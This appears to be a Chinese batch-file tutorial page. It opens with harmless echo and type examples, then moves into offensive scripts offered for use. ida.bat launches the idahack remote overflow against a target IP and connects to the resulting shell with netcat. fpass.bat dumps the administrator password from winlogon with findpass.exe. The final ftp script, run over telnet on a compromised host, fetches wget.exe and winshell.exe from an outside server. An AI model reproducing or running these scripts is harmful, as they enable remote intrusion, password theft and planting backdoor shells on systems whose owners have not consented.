######################################################################
4. 简单批处理文件概念
######################################################################
echo this is test > a.txt
type a.txt
echo this is test 11111 >> a.txt
type a.txt
echo this is test 22222 > a.txt
type a.txt
第二个echo是追加
第三个echo将清空a.txt 重新创建 a.txt
netstat -n │ find "3389"
这个将要列出所有连接3389的用户的ip.
________________test.bat___________________________________________________
@echo please care
echo plese care 1111
echo plese care 2222
echo plese care 3333
@echo please care
@echo plese care 1111
@echo plese care 2222
@echo plese care 3333
rem 不显示注释语句,本行显示
@rem 不显示注释语句,本行不显示
@if exist %windir%\system32\find.exe (echo find find.exe !!!) else (echo error: not find find.exe)
@if exist %windir%\system32\fina.exe (echo find fina.exe !!!) else (echo error: not find fina.exe)
___________________________________________________________________________
下面我们以具体的一个idahack程序就是ida远程溢出为例子.应该是很简单的.
___________________ida.bat_________________________________________________
@rem ver 1.0
@if not exist %windir%\system32\idahack.exe echo "error: dont find idahack.exe"
@if not exist %windir%\system32\nc.exe echo "error: dont find nc.exe"
@if "%1" =="" goto usage
@if not "%2" =="" goto sp2
:start
@echo now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
idahack.exe %1 80 1 99 >%temp%\_tmp
@echo "prog exit code [%errorlevel%] idahack.exe"
@type %temp%\_tmp
@find "good luck" %temp%\_tmp
@echo "prog exit code [%errorlevel%] find [goog luck]"
@if not errorlevel 1 nc.exe %1 99
@goto end
:sp2
@idahack.exe %1 80 %2 99 %temp%\_tmp
@type %temp%\_tmp
@find "good luck" %temp%\_tmp
@if not errorlevel 1 nc.exe %1 99
@goto end
:usage
@echo example: ida.bat ip
@echo example: ida.bat ip (2,3)
:end
_____________________ida.bat__end_________________________________
下面我们再来第二个文件.就是得到administrator的口令.
大多数人说得不到.其实是自己的没有输入正确的信息.
___________________________fpass.bat____________________________________________
@rem ver 1.0
@if not exist %windir%\system32\findpass.exe echo "error: dont find findpass.exe"
@if not exist %windir%\system32\pulist.exe echo "error: dont find pulist.exe"
@echo start....
@echo ____________________________________
@if "%1"=="" goto usage
@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt
@echo "prog exit code [%errorlevel%] findpass.exe"
@type %temp%\_findpass.txt
@echo ________________________________here__pass★★★★★★★★
@ipconfig /all >>%temp%\_findpass.txt
@goto end
:usage
@pulist.exe >%temp%\_pass.txt
@findstr.exe /i "winlogon explorer internat" %temp%\_pass.txt
@echo "example: fpass.bat %1 %2 %3 %4 !!!"
@echo "usage: findpass.exe domainname username pid-of-winlogon"
:end
@echo " fpass.bat %computername% %username% administrator "
@echo " fpass.bat end [%errorlevel%] !"
_________________fpass.bat___end___________________________________________________________
还有一个就是已经通过telnet登陆了一个远程主机.怎样上传文件(win)
依次在窗口输入下面的东西. 当然了也可以全部拷贝.ctrl+v过去. 然后就等待吧!!
echo open 210.64.x.4 3396>w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get wget.exe >>w
echo get winshell.exe >>w
echo get any.exe >>w
echo quit >>w
ftp -s:w
3
您可能感兴趣的文章:
如您对本文有疑问或者有任何想说的,请 点击进行留言回复,万千网友为您解惑!
网友评论